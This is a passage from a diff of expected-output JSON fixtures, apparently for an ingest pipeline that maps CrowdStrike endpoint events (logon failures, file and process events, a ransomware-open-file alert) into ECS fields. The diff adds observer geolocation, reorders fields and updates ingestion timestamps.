+ }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffffd8844a59acce5e1f4ad01888", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:52.993Z", "ecs": { @@ -7193,7 +8162,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151161900Z", + "ingested": "2021-12-14T14:41:26.533787858Z", "original": "{\"ClientComputerName\":\"com1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"7073822473144\",\"ContextThreadId\":\"48689911139327\",\"ContextTimeStamp\":\"1604855152.993\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"EtwRawProcessId\":\"744\",\"EtwRawThreadId\":\"5304\",\"LogonDomain\":\"BROADCAST\",\"LogonType\":\"3\",\"RemoteAddressIP4\":\"67.43.156.14\",\"Status\":\"3221225581\",\"SubStatus\":\"3221225578\",\"UserName\":\"user5\",\"aid\":\"ffffffffd8844a59acce5e1f4ad01888\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogonFailed2\",\"id\":\"ffffffff-1111-11eb-a8aa-067029dffccb\",\"name\":\"UserLogonFailed2V2\",\"timestamp\":\"1604855154274\"}", "created": "2020-11-08T17:05:54.274Z", "kind": "event", @@ -7241,12 +8210,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff4a0946365161093453e596d4", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff4a0946365161093453e596d4", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:51.534Z", "file": { @@ -7272,7 +8250,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151168200Z", + "ingested": "2021-12-14T14:41:26.533788301Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextProcessId\":\"1838383212125\",\"ContextThreadId\":\"27242382481217\",\"ContextTimeStamp\":\"1604855151.534\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileIdentifier\":\"b0754a8f86feffffb0754a8f86feffff09764a8f86feffff\",\"FileObject\":\"18446636884348143072\",\"IrpFlags\":\"1028\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Program Files\\\\WindowsApps\\\\Deleted\\\\Microsoft.Getstarted_9.10.32461.0_x64__8wekyb3d8bbweacf6b996-01b3-402c-bd01-a67529f94699\\\\clrcompression.dll\",\"aid\":\"ffffffff4a0946365161093453e596d4\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ExecutableDeleted\",\"id\":\"ffffffff-1111-11eb-b23b-064dea059649\",\"name\":\"ExecutableDeletedV3\",\"timestamp\":\"1604855154670\"}", "created": "2020-11-08T17:05:54.670Z", "kind": "event", @@ -7300,6 +8278,23 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "vendor": "crowdstrike", + "ip": "67.43.156.13", + "serial_number": "ffffffffcfe84e8c6a52c4001bd83761", + "type": "agent", + "version": "1007.4.0009202.1" + }, "process": { "pid": 20195, "thread": { @@ -7310,24 +8305,10 @@ "sha256": "295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a" } }, + "@timestamp": "2020-11-08T17:05:35.209Z", "os": { "type": "macos" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffffcfe84e8c6a52c4001bd83761", - "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0009202.1", - "vendor": "crowdstrike", - "ip": "67.43.156.13" - }, - "@timestamp": "2020-11-08T17:05:35.209Z", "ecs": { "version": "1.12.0" }, @@ -7344,7 +8325,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151174600Z", + "ingested": "2021-12-14T14:41:26.533788690Z", "original": "{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0009202.1\",\"ConfigStateHash\":\"230795414\",\"ContextProcessId\":\"318137549555284836\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855135.209\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"20195\",\"SHA256HashData\":\"295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"318137549555284836\",\"aid\":\"ffffffffcfe84e8c6a52c4001bd83761\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-ae31-065d76bec0c3\",\"name\":\"EndOfProcessMacV11\",\"timestamp\":\"1604855160047\"}", "created": "2020-11-08T17:06:00.047Z", "kind": "event", @@ -7378,9 +8359,32 @@ "NetworkCloseCount": 0, "SuspectStackCount": 0, "cid": "ffffffff30a3407dae27d0503611022d" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", + "serial_number": "ffffffff80984ea8b49d9a53f590c566", + "type": "agent", + "version": "1007.3.0011603.1" + }, "process": { "entity_id": "683078218537", "pid": 19400, @@ -7388,24 +8392,10 @@ "id": 9384 } }, + "@timestamp": "2020-11-08T17:06:11.731Z", "os": { "type": "windows" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff80984ea8b49d9a53f590c566", - "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "@timestamp": "2020-11-08T17:06:11.731Z", "ecs": { "version": "1.12.0" }, @@ -7421,7 +8411,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151181Z", + "ingested": "2021-12-14T14:41:26.533789073Z", "original": "{\"ApiReturnValue\":\"1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"683078218537\",\"ContextTimeStamp\":\"1604855171.731\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"EtwRawProcessId\":\"19400\",\"EtwRawThreadId\":\"9384\",\"aid\":\"ffffffff80984ea8b49d9a53f590c566\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"RegisterRawInputDevicesEtw\",\"id\":\"ffffffff-1111-11eb-a570-0685ba2a382f\",\"name\":\"RegisterRawInputDevicesEtwV1\",\"timestamp\":\"1604855173077\"}", "created": "2020-11-08T17:06:13.077Z", "kind": "event", @@ -7443,7 +8433,13 @@ "EffectiveTransmissionClass": "3", "Entitlements": "15", "cid": "ffffffff30a3407dae27d0503611022d" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "server": { @@ -7470,12 +8466,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffffc94c645268f64fc900213f", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffffc94c645268f64fc900213f", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:06:14.018Z", "file": { @@ -7497,7 +8502,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151187300Z", + "ingested": "2021-12-14T14:41:26.533789458Z", "original": "{\"CompletionEventId\":\"Event_ChannelDataDownloadCompleteV1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"DownloadPath\":\"metahash+/cfs/channelfiles/0000000013/b2acba1a30a3407dae27d0503611022d/C-00000013-00000000-00000408.sys\",\"DownloadPort\":\"443\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"EffectiveTransmissionClass\":\"0\",\"Entitlements\":\"15\",\"TargetFileName\":\"C-00000013-00000000-00000408.sys\",\"aid\":\"ffffffffffc94c645268f64fc900213f\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"LFODownloadConfirmation\",\"id\":\"ffffffff-1111-11eb-8ab5-0643392fc75d\",\"name\":\"LFODownloadConfirmationV1\",\"timestamp\":\"1604855174018\"}", "created": "2020-11-08T17:06:14.018Z", "kind": "event", @@ -7538,12 +8543,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff280b41b956a91e816bd9b9b0", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff280b41b956a91e816bd9b9b0", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:46.590Z", "file": { @@ -7569,7 +8583,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151193600Z", + "ingested": "2021-12-14T14:41:26.533789944Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1763245019\",\"ContextProcessId\":\"2071361595421\",\"ContextThreadId\":\"41650430047375\",\"ContextTimeStamp\":\"1604855146.590\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileIdentifier\":\"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00\",\"FileObject\":\"18446622606546437424\",\"IrpFlags\":\"395312\",\"MajorFunction\":\"6\",\"MinorFunction\":\"0\",\"NewFileIdentifier\":\"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00\",\"OperationFlags\":\"0\",\"SourceFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\assembly\\\\temp\\\\EKA0UARWWK\\\\Microsoft.WSMan.Management.ni.dll\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\Microsoft.We0722664#\\\\c2579d00f9849413b8b7948dd00ac863\\\\Microsoft.WSMan.Management.ni.dll\",\"aid\":\"ffffffff280b41b956a91e816bd9b9b0\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewExecutableRenamed\",\"id\":\"ffffffff-1111-11eb-8162-0663305b686f\",\"name\":\"NewExecutableRenamedV6\",\"timestamp\":\"1604855177513\"}", "created": "2020-11-08T17:06:17.513Z", "kind": "event", @@ -7615,12 +8629,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff2c9f4066b0b5f2f00265503c", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff2c9f4066b0b5f2f00265503c", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:06:05.213Z", "file": { @@ -7645,7 +8668,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151200Z", + "ingested": "2021-12-14T14:41:26.533790341Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"402097454\",\"ContextProcessId\":\"66601077523\",\"ContextThreadId\":\"2500785639062\",\"ContextTimeStamp\":\"1604855165.213\",\"DesiredAccess\":\"1048577\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"128\",\"FileIdentifier\":\"d2f4250ff1ba3b4ca66e123c5269884ca6f8020000002700\",\"FileObject\":\"18446641334185168032\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"35668001\",\"ShareAccess\":\"3\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\CbsTemp\\\\30848497_1904507751\\\\FodWU\",\"aid\":\"ffffffff2c9f4066b0b5f2f00265503c\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"DirectoryCreate\",\"id\":\"ffffffff-1111-11eb-9411-06b7c99be087\",\"name\":\"DirectoryCreateV1\",\"timestamp\":\"1604855180332\"}", "created": "2020-11-08T17:06:20.332Z", "kind": "event", @@ -7704,12 +8727,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "fffffffffcc4413057adc260e99b0774", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "fffffffffcc4413057adc260e99b0774", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:06:36.468Z", "ecs": { @@ -7730,7 +8762,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151206400Z", + "ingested": "2021-12-14T14:41:26.533790750Z", "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k netsvcs -p -s wlidsvc\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextTimeStamp\":\"1604855196.468\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\svchost.exe\",\"InterfaceGuid\":\"367ABB81-9844-35F1-AD32-98F038001003\",\"InterfaceVersion\":\"131072\",\"RpcClientProcessId\":\"949196415400\",\"RpcClientThreadId\":\"44209361549673\",\"RpcNestingLevel\":\"0\",\"RpcOpNum\":\"19\",\"ServiceDisplayName\":\"wlidsvc\",\"TargetProcessId\":\"955370934902\",\"TokenType\":\"1\",\"UserName\":\"user6\",\"aid\":\"fffffffffcc4413057adc260e99b0774\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ServiceStarted\",\"id\":\"ffffffff-1111-11eb-9c98-02c501fe7d81\",\"name\":\"ServiceStartedV2\",\"timestamp\":\"1604855196635\"}", "created": "2020-11-08T17:06:36.635Z", "kind": "event", @@ -7792,12 +8824,21 @@ "direction": "outbound" }, "observer": { - "serial_number": "ffffffffed0f41575620ab9fb25ce105", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0011104.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffed0f41575620ab9fb25ce105", + "type": "agent", + "version": "1007.4.0011104.1" }, "@timestamp": "2020-11-08T17:06:40.751Z", "ecs": { @@ -7819,7 +8860,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151212800Z", + "ingested": "2021-12-14T14:41:26.533791183Z", "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"203564169\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"319255017313886870\",\"ContextTimeStamp\":\"1604855200.751\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"LocalPort\":\"0\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemotePort\":\"2181\",\"aid\":\"ffffffffed0f41575620ab9fb25ce105\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkConnectIP6\",\"id\":\"ffffffff-1111-11eb-81f1-061cdebbd115\",\"name\":\"NetworkConnectIP6MacV5\",\"timestamp\":\"1604855200836\"}", "created": "2020-11-08T17:06:40.836Z", "kind": "event", @@ -7860,12 +8901,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff73164cfa9656c4caff8a2a38", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff73164cfa9656c4caff8a2a38", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:06:52.031Z", "ecs": { @@ -7887,7 +8937,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151219100Z", + "ingested": "2021-12-14T14:41:26.533791568Z", "original": "{\"AuthenticationId\":\"1656178821\",\"AuthenticationPackage\":\"Kerberos\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"30254389526587\",\"ContextThreadId\":\"275230771323179\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonDomain\":\"dom1\",\"LogonId\":\"1656178821\",\"LogonServer\":\"srv1\",\"LogonTime\":\"1604855211.249\",\"LogonType\":\"5\",\"PasswordLastSet\":\"1530626210.104\",\"RemoteAccount\":\"1\",\"SessionId\":\"0\",\"UserCanonical\":\"\",\"UserFlags\":\"32\",\"UserIsAdmin\":\"0\",\"UserLogonFlags\":\"0\",\"UserName\":\"user7\",\"UserPrincipal\":\"user7@dom4.cm\",\"UserSid\":\"S-1-5-21-606747145-1364589140-725345543-183372\",\"aid\":\"ffffffff73164cfa9656c4caff8a2a38\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserIdentity\",\"id\":\"ffffffff-1111-11eb-86e3-02db1faa1327\",\"name\":\"UserIdentityV2\",\"timestamp\":\"1604855212031\"}", "created": "2020-11-08T17:06:52.031Z", "kind": "event", @@ -7964,12 +9014,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffbe8a46386afe80c5ef64d0b5", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0010609.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffbe8a46386afe80c5ef64d0b5", + "type": "agent", + "version": "1007.3.0010609.1" }, "@timestamp": "2020-11-08T17:07:17.946Z", "ecs": { @@ -7989,7 +9048,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151225300Z", + "ingested": "2021-12-14T14:41:26.533791957Z", "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"C:\\\\WINDOWS\\\\System32\\\\svchost.exe -k netsvcs -p -s NetSetupSvc\",\"ConfigBuild\":\"1007.3.0010609.1\",\"ConfigStateHash\":\"4193986770\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\svchost.exe\",\"ImageSubsystem\":\"2\",\"IntegrityLevel\":\"16384\",\"MD5HashData\":\"8a0a29438052faed8a2532da50455756\",\"ParentAuthenticationId\":\"999\",\"ParentProcessId\":\"2881931477041\",\"ProcessCreateFlags\":\"525324\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"8193\",\"ProcessStartTime\":\"1604842733.215\",\"ProcessSxsFlags\":\"64\",\"RawProcessId\":\"6160\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6\",\"SessionId\":\"0\",\"SourceProcessId\":\"2881931477041\",\"SourceThreadId\":\"70316664105336\",\"Tags\":\"27, 29, 53, 54, 55, 185, 10445360464024, 10445360464025, 10445360464026, 10445360464258, 10445360464273, 10445360464274, 12094627905582, 12094627906234, 211655988347297\",\"TargetProcessId\":\"2882232404222\",\"TokenType\":\"2\",\"UserSid\":\"S-1-5-18\",\"WindowFlags\":\"128\",\"aid\":\"ffffffffbe8a46386afe80c5ef64d0b5\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-b4f9-06e3a7e5503b\",\"name\":\"ProcessRollup2V16\",\"timestamp\":\"1604855237946\"}", "created": "2020-11-08T17:07:17.946Z", "kind": "event", @@ -8060,12 +9119,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffac4148947ed68497e89f3308", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffac4148947ed68497e89f3308", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T09:58:32.519Z", "file": { @@ -8091,7 +9159,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151231700Z", + "ingested": "2021-12-14T14:41:26.533792342Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1763245019\",\"ContextProcessId\":\"1016182570608\",\"ContextThreadId\":\"37343520154472\",\"ContextTimeStamp\":\"1604829512.519\",\"DesiredAccess\":\"1179785\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"0\",\"FileIdentifier\":\"7a9c1c1610045d45a54bd6643ac12ea767a5020000000c00\",\"FileObject\":\"18446670458156489088\",\"Information\":\"1\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"16777312\",\"ShareAccess\":\"5\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\user11\\\\Downloads\\\\file.pptx\",\"aid\":\"ffffffffac4148947ed68497e89f3308\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"RansomwareOpenFile\",\"id\":\"ffffffff-1111-11eb-9756-06fe7f8f682f\",\"name\":\"RansomwareOpenFileV4\",\"timestamp\":\"1604855242091\"}", "created": "2020-11-08T17:07:22.091Z", "kind": "alert", @@ -8150,12 +9218,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "fffffffffdab492a5a20cd0417395a73", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0010609.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "fffffffffdab492a5a20cd0417395a73", + "type": "agent", + "version": "1007.3.0010609.1" }, "@timestamp": "2020-11-08T17:07:54.377Z", "ecs": { @@ -8174,7 +9251,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151237900Z", + "ingested": "2021-12-14T14:41:26.533792728Z", "original": "{\"AllocateVirtualMemoryCount\":\"0\",\"ArchiveFileWrittenCount\":\"0\",\"AsepWrittenCount\":\"0\",\"BinaryExecutableWrittenCount\":\"0\",\"CLICreationCount\":\"0\",\"ConHostId\":\"13532\",\"ConHostProcessId\":\"1731198143955\",\"ConfigBuild\":\"1007.3.0010609.1\",\"ConfigStateHash\":\"2030177841\",\"ContextData\":\"\",\"ContextProcessId\":\"1741732942772\",\"ContextThreadId\":\"28523520529271\",\"ContextTimeStamp\":\"1604855274.377\",\"CycleTime\":\"473618996\",\"DirectoryCreatedCount\":\"0\",\"DirectoryEnumeratedCount\":\"0\",\"DnsRequestCount\":\"0\",\"DocumentFileWrittenCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ExeAndServiceCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"ExitCode\":\"0\",\"FileDeletedCount\":\"0\",\"GenericFileWrittenCount\":\"0\",\"ImageSubsystem\":\"2\",\"InjectedDllCount\":\"0\",\"InjectedThreadCount\":\"0\",\"KernelTime\":\"1406250\",\"MaxThreadCount\":\"16\",\"ModuleLoadCount\":\"72\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkConnectCountUdp\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkModuleLoadCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"ParentProcessId\":\"1731198143955\",\"PrivilegedProcessHandleCount\":\"0\",\"ProcessStartTime\":\"1604855154.465\",\"ProtectVirtualMemoryCount\":\"0\",\"QueueApcCount\":\"0\",\"RawProcessId\":\"18176\",\"RegKeySecurityDecreasedCount\":\"0\",\"RemovableDiskFileWrittenCount\":\"0\",\"RunDllInvocationCount\":\"0\",\"SHA256HashData\":\"87419b84f34cdb13f699c0f0803c957e48c27ad83334fcad7bac9ad89c0a466f\",\"ScreenshotsTakenCount\":\"0\",\"ScriptEngineInvocationCount\":\"0\",\"ServiceEventCount\":\"0\",\"SetThreadContextCount\":\"0\",\"SnapshotFileOpenCount\":\"0\",\"SuspectStackCount\":\"0\",\"SuspiciousCredentialModuleLoadCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"SuspiciousFontLoadCount\":\"0\",\"SuspiciousRawDiskReadCount\":\"0\",\"TargetProcessId\":\"1741732942772\",\"UnsignedModuleLoadCount\":\"0\",\"UserMemoryAllocateExecutableCount\":\"0\",\"UserMemoryAllocateExecutableRemoteCount\":\"0\",\"UserMemoryProtectExecutableCount\":\"0\",\"UserMemoryProtectExecutableRemoteCount\":\"0\",\"UserSid\":\"S-1-12-1-1647509123-1308660782-3901357462-3999411581\",\"UserTime\":\"781250\",\"aid\":\"fffffffffdab492a5a20cd0417395a73\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-b685-0241eaddc553\",\"name\":\"EndOfProcessV14\",\"timestamp\":\"1604855276657\"}", "created": "2020-11-08T17:07:56.657Z", "kind": "event", @@ -8270,12 +9347,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "fffffffffa474d216472f3edb73c75ed", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "fffffffffa474d216472f3edb73c75ed", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:08:37.892Z", "file": { @@ -8302,7 +9388,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151244100Z", + "ingested": "2021-12-14T14:41:26.533793118Z", "original": 